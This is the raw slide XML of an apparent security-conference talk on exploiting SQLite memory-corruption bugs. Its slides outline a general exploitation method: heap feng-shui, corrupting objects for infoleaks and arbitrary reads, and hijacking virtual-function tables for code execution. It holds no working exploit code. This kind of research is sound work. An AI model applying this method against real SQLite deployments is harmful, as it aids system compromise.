                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>All data is attacker controlled, controlled allocation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dealloction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, heap spray primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>One for a relative read to leak object addresses, and one for AAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ideally an object with a virtual function table. Attacker can invoke the virtual function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="486149406"/>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My general approach to Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11142306" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This saves *A LOT* of time to invent primitives yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>All data is attacker controlled, controlled allocation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dealloction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, heap spray primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>One for a relative read to leak object addresses, and one for AAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ideally an object with a virtual function table. Attacker can invoke the virtual function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t rush and build exploit payload only to be disappointed that the exploit primitive doesn’t work. Manually corrupt with debugger, before writing actual exploit code</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34964203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SQLite short intro</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>small, fast, self-contained SQL database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>most used database engine in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>world </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(according to the site)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>most of the core </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SQL features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>some features unique in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>SQLite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012806726"/>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Current status</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> primitive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>infoleak</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a good object to corrupt for code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Experiment, Verify, by manually corrupting the objects with a debugger</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484742103"/>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Current status</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="11104984" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Study all prior public research on the subject. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No public material on SQLite exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(except for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blackhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> one with a different bug class)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ery Good* Heap Feng-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
